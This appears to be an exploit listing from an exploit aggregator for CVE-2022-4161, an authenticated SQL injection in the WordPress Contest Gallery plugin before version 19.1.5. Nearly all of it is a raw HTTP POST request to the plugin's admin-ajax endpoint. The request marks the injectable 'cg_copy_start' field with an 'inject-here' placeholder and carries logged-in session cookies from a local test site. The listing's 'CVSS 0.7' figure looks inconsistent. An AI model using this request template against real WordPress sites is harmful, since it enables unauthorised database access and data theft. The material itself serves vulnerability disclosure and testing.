Exploit for Contest Gallery < 19.1.5 - Author+ SQL Injection CVE-2022-4161

Name: Exploit for Contest Gallery < 19.1.5 - Author+ SQL Injection CVE-2022-4161
Rating: 5 (24 reviews)
2022-12-05 | CVSS 0.7
## https://sploitus.com/exploit?id=WPEX-ID:A66AF8F7-1D5F-4FE5-A2BA-03337064583B
POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_gallery=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------153920708638783197901369090779
Content-Length: 1507
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7C8d38932578430fa522ce64ed0143d8be7054cdb5b40694aecf1402276b84f91c; wp-settings-time-2=1668942143; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7Ce49a6e0384972bf193b755ee522182a7075ecf477f3c7a236f7fd32cac02e245
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy_type"

cg_copy_type_options_and_images
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy"

true
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy_id"

1
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy_start"

/**/inject-here/**/
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="option_id_next_gallery"

0
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="id_to_copy"

1
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="edit_gallery_hidden_post"


-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="copy_v7"

true
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="page"

contest-gallery/index.php
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cgBackendHash"

c5df761d52dd842d7a3b5ed58a78774d
-----------------------------153920708638783197901369090779--